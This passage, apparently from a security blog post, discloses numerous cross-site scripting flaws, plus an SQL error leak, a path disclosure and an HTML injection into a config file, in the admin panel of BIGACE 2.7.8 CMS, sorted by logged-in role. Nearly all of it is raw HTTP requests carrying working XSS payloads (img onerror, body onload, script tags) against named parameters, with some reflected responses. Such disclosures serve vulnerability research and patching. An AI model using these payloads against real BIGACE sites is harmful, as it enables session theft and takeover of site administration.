mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500
-----------------------------60191211818685
Content-Disposition: form-data; name="mode"
upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"
"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------60191211818685--
---< request >---
15. xss + information disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode="%20body%20onload%3d"alert(4321)"%3e
---< request >---
Response:
<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>. All rights reserved. <br />© 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---
III. For 'designer' user logged-in:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214
designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---
IV. For admin logged-in:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
Response:
<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022
-----------------------------309932421512500
Content-Disposition: form-data; name="mode"
upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"
a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------309932421512500--
---< request >---
3. same request, parameter data[name] (xss too)
4. same for parameter: data[unique_name], data[description].
for data[description] to reproduce you must exit from <textarea> tag, so
payload should be similar to this one:
</textarea><script>alert(2)</script>
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420
-----------------------------47528326907
Content-Disposition: form-data; name="mode"
upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"
"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------47528326907--
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52
data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
21. SQL Injection
<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
;]
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---
23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---
24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---
25. xss + info disclo
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---
26. adding new community
when you're adding new community you can write
directly to file consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]
In this case, I changed 'aaaa' string to html code to check if page
will show it (as html, not as txt). HTML injection is possible here.
27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---
31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
Cheers o/
Subscribe to:
Posts (Atom)